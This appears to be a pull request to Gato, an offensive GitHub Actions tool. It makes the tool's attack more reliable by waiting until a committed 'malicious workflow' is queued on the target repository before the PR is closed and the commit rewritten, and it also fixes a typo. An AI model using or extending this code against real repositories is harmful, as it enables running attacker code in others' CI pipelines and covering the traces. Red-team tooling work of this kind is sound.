### PR TITLE
A small reliability improvement, and a typo fix

### DIFF
--- a/gato/attack/attack.py
+++ b/gato/attack/attack.py
@@ -189,7 +189,8 @@ class Attacker:
                     "Successfully created a PR! It can be viewed at: "
                     f"{Output.bright(pr_url)}"
                 )
-
+                # Wait for the attack PR job to queue before removing it
+                time.sleep(15)
                 rebase_status = cloned_repo.rewrite_commit()
 
                 if rebase_status:

--- a/gato/attack/attack.py
+++ b/gato/attack/attack.py
@@ -160,12 +160,12 @@ class Attacker:
                     payload, workflow_name=workflow_name
                 )
 
-            status = cloned_repo.commit_file(
+            commit_hash = cloned_repo.commit_file(
                 yaml_contents.encode(),
                 f".github/workflows/{yaml_name}.yml",
                 message=commit_message
             )
-            if not status:
+            if not commit_hash:
                 Output.error("Failed to commit the malicious workflow locally!")
                 return False
 
@@ -189,8 +189,21 @@ class Attacker:
                     "Successfully created a PR! It can be viewed at: "
                     f"{Output.bright(pr_url)}"
                 )
-                # Wait for the attack PR job to queue before removing it
-                time.sleep(15)
+                # Ensure workflow is queued before closing PR
+                for i in range(self.timeout):
+                    workflow_id = self.api.get_recent_workflow(
+                        target_repo, commit_hash)
+                    if workflow_id == -1:
+                        Output.error("Failed to find the created workflow!")
+                        return
+                    elif workflow_id > 0:
+                        break
+                    else:
+                        time.sleep(1)
+                else:
+                    Output.error("Failed to find the created workflow!")
+                    return
+                    
                 rebase_status = cloned_repo.rewrite_commit()
 
                 if rebase_status:

--- a/gato/git/git.py
+++ b/gato/git/git.py
@@ -75,7 +75,7 @@ class Git:
 
             if p.returncode != 0:
                 logger.error("Git clone operation did not succeed!")
-                raise Exception("Git clone operation did not suceeed!")
+                raise Exception("Git clone operation did not succeed!")
 
             p = subprocess.Popen(
                 self.config_command1.split(" "),


### PR DESCRIPTION
@thinkst-cs and I have been playing with Gato -- super cool stuff. We found that the PR-based attack is pretty unreliable, but if you do the same GH API calls manually it works. We seem to have narrowed it down to a timing issue: gato is too fast to delete the PR, and the workflows don't always queue. This led to it working maybe 1/5 of the time, after I added the time.sleep() before the PR deletion steps, it seems to work reliably now.

Also a tiny typo in a status message has been fixed.